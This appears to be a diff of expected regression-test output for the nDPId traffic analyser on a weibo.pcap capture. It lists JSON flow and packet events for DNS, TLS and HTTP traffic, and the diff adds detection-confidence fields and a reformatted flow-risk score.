 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1463089073635,"pkt":"kDVu60UQeJKcD6iOCABFAAAoPQ1AAEAGynPAqAFpL1lB5caLAbuG5TcYPGq4OFAQAOUAuQAA"}
-00821{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1463089073635,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"g.alicdn.com","ja3":"58e7f64db6e4fe4941dd9691d421196c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}}
+00847{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"weibo.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073479,"flow_last_seen":1463089073635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1463089073635,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"47.89.65.229","src_port":50827,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Alibaba","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"g.alicdn.com","ja3":"58e7f64db6e4fe4941dd9691d421196c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,spdy\/3.1,http\/1.1"}}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089073759,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGFnUvWUHlwKgBaQG7xo+u1rhnnywRAoASOQgi\/AAAAgQFqAEBBAIBAwMJ"}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"weibo.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1463089073759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1463089073759,"pkt":"kDVu60UQeJKcD6iOCABFAAAoGylAAEAG7FfAqAFpL1lB5caPAbufLBECrta4aFAQAOWb5wAA"}
 00584{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1463089073760,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":157,"pkt_l4_len":123,"ts_msec":1463089073760,"pkt":"eJKcD6iOkDVu60UQCABFAACPAABAAEARtqPAqAEBwKgBaQA1xdAAe7w5O9aBgAABAAMAAAAABmFjanN0YgZhbGl5dW4DY29tAAABAAHADAAFAAEAAAJYAAcEYWNqc8ATwC8ABQABAAABAAAhBGFjanMGYWxpeXVuA2NvbQNnZHMKYWxpYmFiYWRuc8AawEIAAQABAAAAbAAEKpy4Ew=="}
-00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16":"Suspicious DGA domain name"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"42.156.184.19"}}
+00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":424,"source":"weibo.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073287,"flow_last_seen":1463089073760,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":75,"midstream":0,"ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":50640,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"acjstb.aliyun.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"42.156.184.19"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"weibo.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8np1AAEAG913AqAFpKpy4E8wvAbt9EpT8AAAAAKACchBGkwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073760,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073760,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52272,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"weibo.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1463089073760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073760,"pkt":"kDVu60UQeJKcD6iOCABFAAA8jjVAAEAGB8bAqAFpKpy4E8wwAbsmFYRUAAAAAKACchCuNwAAAgQFtAQCCAoAQQphAAAAAAEDAwc="}
 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1463089073763,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"ts_msec":1463089073763,"pkt":"eJKcD6iOkDVu60UQCABFAACYAABAAEARtprAqAEBwKgBaQA1hB4AhOXUkPeBgAABAAMAAAAABWxvZ2luBnRhb2JhbwNjb20AAAEAAcAMAAUAAQAAASwADAl3YWdicmlkZ2XAEsAuAAUAAQAAAMgAJgl3YWdicmlkZ2UGdGFvYmFvA2NvbQNnZHMKYWxpYmFiYWRuc8AZwEYAAQABAAAALwAEjM2qPw=="}
-00751{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463089073763,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.170.63"}}
+00777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":429,"source":"weibo.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089073289,"flow_last_seen":1463089073763,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1463089073763,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":33822,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"login.taobao.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"140.205.170.63"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073764,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073764,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47721,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"weibo.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1463089073764,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073764,"pkt":"kDVu60UQeJKcD6iOCABFAAA8woBAAEAGfx3AqAFpjM2qP7ppAbuaKMjiAAAAAKACchCy\/gAAAgQFtAQCCAoAQQpiAAAAAAEDAwc="}
 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1463089073773,"pkt":"eJKcD6iOkDVu60UQCABFAAA0AABAADEGjQneSRxgwKgBaQBQpSMt08jatYdf34ASOQjHwAAAAgQFqAEBBAIBAwMI"}
 00443{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":436,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1463089073773,"pkt":"kDVu60UQeJKcD6iOCABFAAAoVdlAAEAGKDzAqAFp3kkcYKUjAFC1h1\/fLdPI21AQAOVAqwAA"}
-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1463089073773,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"u1.img.mobile.sina.cn","url":"u1.img.mobile.sina.cn\/public\/files\/image\/620x300_img5653d57c6dab2.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
+00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":437,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1463089073773,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"u1.img.mobile.sina.cn","url":"u1.img.mobile.sina.cn\/public\/files\/image\/620x300_img5653d57c6dab2.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/50.0.2661.102 Safari\/537.36"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073788,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073788,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"42.156.184.19","src_port":52274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"weibo.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1463089073788,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073788,"pkt":"kDVu60UQeJKcD6iOCABFAAA8M4FAAEAGYnrAqAFpKpy4E8wyAbubxznpAAAAAKACchCC5wAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073789,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073789,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"140.205.170.63","src_port":47723,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"weibo.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1463089073789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1463089073789,"pkt":"kDVu60UQeJKcD6iOCABFAAA8F+ZAAEAGKbjAqAFpjM2qP7prAbvY7h2OAAAAAKACchAfhQAAAgQFtAQCCAoAQQpoAAAAAAEDAwc="}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1463089073394,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":428,"flow_tot_l4_payload_len":428,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42275,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00569{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463089073537,"flow_last_seen":1463089073537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"222.73.28.96","src_port":42280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00604{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089073286,"flow_last_seen":1463089073393,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":18035,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1463089070757,"flow_last_seen":1463089070841,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.1","src_port":54988,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00638{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00571{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1463089071730,"flow_last_seen":1463089071755,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.212.69","src_port":37802,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1463089072445,"flow_last_seen":1463089073885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4308,"flow_tot_l4_payload_len":69723,"flow_avg_l4_payload_len":657,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35803,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1463089072445,"flow_last_seen":1463089073773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2872,"flow_tot_l4_payload_len":49381,"flow_avg_l4_payload_len":685,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35804,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1463089072445,"flow_last_seen":1463089073819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":20463,"flow_avg_l4_payload_len":499,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35805,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1463089073319,"flow_last_seen":1463089073551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":3815,"flow_avg_l4_payload_len":293,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1463089073321,"flow_last_seen":1463089073852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1436,"flow_tot_l4_payload_len":32930,"flow_avg_l4_payload_len":621,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35807,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Sina(Weibo)","breed":"Fun","category":"SocialNetwork"}}
-00609{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":498,"source":"weibo.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1463089073322,"flow_last_seen":1463089073383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1463089073893,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"93.188.134.246","src_port":35808,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
